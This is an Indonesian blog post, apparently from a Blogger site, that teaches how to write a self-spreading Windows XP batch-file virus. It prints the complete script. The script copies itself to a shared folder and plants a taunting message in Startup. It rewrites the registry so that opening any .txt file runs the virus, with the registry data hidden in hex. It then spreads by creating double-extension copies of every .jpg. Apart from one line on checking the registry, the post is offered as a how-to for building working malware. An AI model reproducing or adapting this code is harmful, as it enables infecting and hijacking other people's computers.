Ads Fundi

Membuat virus file batch

Membuat virus file batch

Virus batch dirancang untuk menginfeksi Windows XP .Virus ini menggunakan ekxtensi ganda,jika di klik maka akan menggandakan dirinya seperti file jpg yang berada dalam folder yang sama.Jika di dalam folder yang sama ada file bernama Beach.jpg,maka file bat ini akan mengkopi dirinya membentuk file beach.jpg.bat.Selain meniru nama file jpg,file ini juga meniru file text (file berekstensi txt)hebat bukan....
Sebagai penyamaran ,saat kita membuka file txt,maka program notepad sebagai program default untuk file text tetap akan terbuka anda mungkin bertanya ,kok bisa saat membuka file text biasa justru file bat yang bekerja?Rahasianya yaitu perubahan nilai Registry penghandle file text ,yaitu berada di HKEY_CLASSES_ROOT\txtfile\shell\open\command Rubah nilai defaultnya dari %SystemRoot%\system32\NOTEPAD.EXE%1 menjadi C:\Documents and Settings\All User\Documents\Readme.bat%1.
Jika komputer anda terinfeksi virus yang merubah program default untuk membuka progrsm,maka anda harus memerikasa program penghandlenya di registry.Kembali ke program virus .Untuk memasukan nilai ke dalam registry melalui file bat,maka dibentuk terlebih dahulu file reg untuk kemudian diekspor ke dalam registry.Isi file reg yang akan diekspor adalah sebagai berikut:

anda bisa search di google,ketikan dibawah ini

Windows Registry Editor Version 5.00

Langsung saja kita mulai pembuatan virus bat,adalah sebagai berikut:

@Echo off
If not Exist C:\DOCUME~1\ALLUSE~1\DOCUME~1\Readme.bat Copy %0 C:\DOCUME~1\ALLUSE~1\DOCUME~1\Readme.bat >Null
if not Exist C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup\Pesan.wri Goto Pesan
Goto Infect
:pesan
Echo Halo,selamat datang di komputer yang telah saya kuasai >Pesan.wri
Echo Jangan salahkan saya jika ini terjadi,tapi salahkan diri Anda sendir >>Pesan.wri
Echo Lain waktu lebih waspada ya >>Pesan.wri
Copy Pesan.wri C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup\Pesan.wri >Null
Echo Windows Registry Editor Version 5.00 >Infect.reg
Echo. >>Infect.reg
Echo [HKEY_CLASSES_ROOT\txtfile\shell\open\command] >>Infect.reg
Echo @=hex (2) :43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,\ >>Infect.reg
Echo 00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,69,00,6e,00,67,00,\ >>Infect.reg
Echo 73,00,5c,00,41,00,6c,00,6c,00,20,00,55,00,73,00,65,00,72,00,73,00,5c,00,44,\ >>Infect.reg
Echo 00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,5c,00,52,00,65,00,61,00,\ >>Infect.reg
Echo 64,00,6d,00,65,00,2e,00,62,00,61,00,74,00,20,00,25,00,31,00,00,00 >>Infect.reg
Copy Infect.reg C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg >Null
C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg
@Del Infect.reg
@Del C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg
:Infect
Start %SystemRoot%\system32\NOTEPAD.EXE\ %1
Copy %0 %1.bat >Null
For %%A in (*.Jpg) do type %0 >%%A.bat
@Del null
Exit

0 komentar:

Diberdayakan oleh Blogger.

Pengikut

Ads Fundi

adscamp